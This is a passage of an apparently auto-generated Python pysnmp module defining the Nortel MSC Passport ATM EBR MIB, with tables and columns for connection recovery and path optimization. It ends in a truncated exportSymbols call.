    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfVptUniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,
114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
# -- mscAtmIfVptVccSrcEbrOv (…114.9.20.8.2): per-connection EBR override under
# -- the Vpt Vcc Src component; five-level index including the Src index from
# -- the AtmNetworking MIB.
mscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2))
mscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVptVccSrcIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVptVccSrcIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccSrcEbrOvIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
# no(0)/yes(1) enumerations; generated with cloned initial value 'yes'.
mscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# -- mscAtmIfVptVccEbrInfo (…114.9.20.12): EBR information per Vpt Vcc; the
# -- columns defined in this chunk are read-only.
mscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12))
mscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,
9, 20, 12, 1, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
# Operational attributes (subtree 30): read-only no(0)/yes(1) enumerations.
mscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVptVccIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVptVccEbrInfoIndex'))
if mibBuilder.loadTexts:
    mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1),
Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))\nmscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 1))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 96, 7, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatus.setStatus('mandatory')\nmscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrComponentName.setStatus('mandatory')\nmscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStorageType.setStatus('mandatory')\nmscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 96, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrIndex.setStatus('mandatory')\nmscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 96, 
7, 20))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrProvTable.setStatus('mandatory')\nmscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrProvEntry.setStatus('mandatory')\nmscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=\n ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')\n ).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 96, 7, 30))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrOperTable.setStatus('mandatory')\nmscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrOperEntry.setStatus('mandatory')\nmscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n 
mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=\n ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1,\n 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(\n subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114,\n 96, 7, 40))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStatsTable.setStatus('mandatory')\nmscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 96, 7, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmPnniMIB', 'mscAtmIfPnniIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfPnniEbrIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')\natmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))\natmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))\natmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3)\n )\natmEbrGroupCA02A 
= MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, \n 1, 3, 2))\natmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))\natmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159,\n 3, 1))\natmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, \n 159, 3, 1, 3))\natmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, \n 159, 3, 1, 3, 2))\nmibBuilder.exportSymbols('Nortel-MsCarrier-MscPassport-AtmEbrMIB',\n mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA,\n mscAtmIfUniEbrTotalConnectionRecoveries=\n mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=\n mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=\n mscAtmIfVptPnniEbrProvEntry,\n mscAtmIfVptVccEbrInfoTotalPathOptimizations=\n mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=\n mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=\n mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup,\n mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery,\n mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry,\n mscAtmIfVptUniEbrTotalPathOptimizations=\n mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=\n mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr,\n mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization,\n mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry,\n mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType,\n mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus,\n mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable,\n mscAtmIfVptPnniEbrSubscribedConnections=\n mscAtmIfVptPnniEbrSubscribedConnections,\n mscAtmIfVccEbrInfoTotalPathOptimizations=\n mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=\n mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=\n mscAtmIfVptUniEbrProvEntry,\n mscAtmIfVptPnniEbrEligibleRecoveredConnections=\n mscAtmIfVptPnniEbrEligibleRecoveredConnections,\n 
mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName,\n mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry,\n mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex,\n mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType,\n mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable,\n mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization,\n mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry,\n mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry,\n mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType,\n mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry,\n mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,\n mscAtmIfPnniEbrTotalConnectionRecoveries=\n mscAtmIfPnniEbrTotalConnectionRecoveries,\n mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,\n mscAtmIfPnniEbrEligibleRecoveredConnections=\n mscAtmIfPnniEbrEligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoRecoverySubscribed=\n mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=\n mscAtmIfVptVccSrcEbrOvProvTable,\n mscAtmIfVptVccEbrInfoConnectionRecovered=\n mscAtmIfVptVccEbrInfoConnectionRecovered,\n mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,\n mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,\n mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,\n mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,\n mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,\n mscAtmIfVptIispEbrTotalPathOptimizations=\n mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=\n mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,\n mscAtmIfVptUniEbrIneligibleRecoveredConnections=\n mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02\n =atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=\n mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=\n mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=\n 
mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=\n mscAtmIfVpcSrcEbrOvOptimizationSubscribed,\n mscAtmIfIispEbrTotalPathOptimizations=\n mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName\n =mscAtmIfVccSrcEbrOvComponentName,\n mscAtmIfVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=\n mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=\n mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=\n mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=\n mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=\n mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=\n mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=\n mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=\n mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=\n mscAtmIfIispEbrRowStatusEntry,\n mscAtmIfVptIispEbrIneligibleRecoveredConnections=\n mscAtmIfVptIispEbrIneligibleRecoveredConnections,\n atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,\n mscAtmIfVptVccEbrInfoOptimizationSubscribed=\n mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=\n mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=\n mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=\n mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=\n mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=\n mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=\n mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=\n mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=\n mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=\n mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=\n mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=\n mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=\n mscAtmIfPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,\n 
